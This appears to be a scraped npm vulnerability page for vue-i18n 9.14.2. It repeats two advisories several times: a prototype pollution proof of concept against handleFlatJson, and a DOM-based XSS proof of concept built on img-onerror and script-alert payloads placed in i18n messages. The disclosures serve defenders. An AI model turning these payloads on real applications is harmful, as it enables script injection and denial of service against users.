Version Details and Security Vulnerabilities

📦

vue-i18n

9.14.2

Comparision Betweeen 9.14.2 and 9.14.1

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

1.56 MB

1.55 MB

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

vue-i18n

9.14.2

Comparision Betweeen 9.14.2 and 9.14.1

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

1.56 MB

1.55 MB

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 9.14.2 of the package vue-i18n.

All Security Vulnerabilities

All the vulnerabilities related to the version 9.14.2 of the package

Summary:

Vue I18n Allows Prototype Pollution in handleFlatJson

Details:

Vulnerability type: Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@intlify/message-resolver/index.js

# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @intlify/message-resolver@9.1.10
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

// poc.js
(async () => {
    const lib = await import('@intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

Details about vue-i18n@9.14.2

Summary:

vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

Details:

Summary

The escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting fails to prevent execution of certain tag-based payloads, such as <img src=x onerror=...>, if the interpolated value is inserted inside an HTML context using v-html.

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>'; Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p> Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

Details about vue-i18n@9.14.2

Summary:

vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

Details:

Summary

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>'; Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p> Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

Details about @intlify/core-base@9.14.2

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 9.14.2 of the package vue-i18n.

All Security Vulnerabilities

All the vulnerabilities related to the version 9.14.2 of the package

Summary:

Vue I18n Allows Prototype Pollution in handleFlatJson

Details:

Vulnerability type: Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@intlify/message-resolver/index.js

# v9.2 or later
node_modules/@intlify/vue-i18n-core/index.js

Description:

PoC:

// install the package with the latest version
~$ npm install @intlify/message-resolver@9.1.10
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

// poc.js
(async () => {
    const lib = await import('@intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

Details about vue-i18n@9.14.2

Summary:

vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

Details:

Summary

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>'; Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p> Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

Details about vue-i18n@9.14.2

Summary:

vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

Details:

Summary

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>'; Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p> Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

Details about @intlify/core-base@9.14.2

Version Details and Security Vulnerabilities

vue-i18n

Comparision Betweeen 9.14.2 and 9.14.1

Security Vulnerabilities

Version Details and Security Vulnerabilities

vue-i18n

Comparision Betweeen 9.14.2 and 9.14.1

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

Version Details and Security Vulnerabilities

vue-i18n

Comparision Betweeen 9.14.2 and 9.14.1

Security Vulnerabilities

Version Details and Security Vulnerabilities

vue-i18n

Comparision Betweeen 9.14.2 and 9.14.1

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

vue-i18n@9.14.2 GHSA-p2ph-7g93-hw3m 8.9

vue-i18n@9.14.2 GHSA-x8qp-wqqm-57ph 5.3

Summary

Details

PoC

Impact

@intlify/core-base@9.14.2 GHSA-x8qp-wqqm-57ph 5.3

Summary

Details

PoC

Impact

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

vue-i18n@9.14.2 GHSA-p2ph-7g93-hw3m 8.9

vue-i18n@9.14.2 GHSA-x8qp-wqqm-57ph 5.3

Summary

Details

PoC

Impact

@intlify/core-base@9.14.2 GHSA-x8qp-wqqm-57ph 5.3

Summary

Details

PoC

Impact